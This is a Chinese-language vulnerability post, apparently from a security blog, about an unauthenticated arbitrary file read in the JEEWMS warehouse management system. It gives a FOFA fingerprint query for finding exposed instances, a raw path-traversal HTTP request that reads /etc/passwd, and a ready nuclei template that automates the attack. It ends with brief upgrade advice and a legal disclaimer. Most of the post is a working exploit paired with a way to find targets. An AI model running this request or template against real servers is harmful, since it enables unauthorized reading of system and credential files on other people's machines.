JEEWMS存在任意文件读取漏洞

漏洞描述

JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露。

产品界面

fofa语法

body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"

POC

 
  1. GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/

nuclei验证

 
  1. id: JEEWMS-file-read
  2. info:
  3. name: JEEWMS存在任意文件读取
  4. author: nobody
  5. severity: high
  6. description: |
  7. JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露。
  8. impact: |
  9. 攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露.
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
  16. tags: JEEWMS,fileread
  17. requests:
  18. - raw:
  19. - |
  20. GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
  21. Host: {{Hostname}}
  22. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/
  23. matchers-condition: and
  24. matchers:
  25. - type: word
  26. part: body
  27. words:
  28. - "/bin/bash"
  29. - type: status
  30. status:
  31. - 200

修复建议

  • 建议升级到最新版本
  • 非必要禁止公网访问或白名单访问
  •  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

    免费领取安全学习资料包!

    渗透工具

    技术文档、书籍

     

    面试题

    帮助你在面试中脱颖而出

    视频

    基础到进阶

    环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

     

    应急响应笔记

    学习路线

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值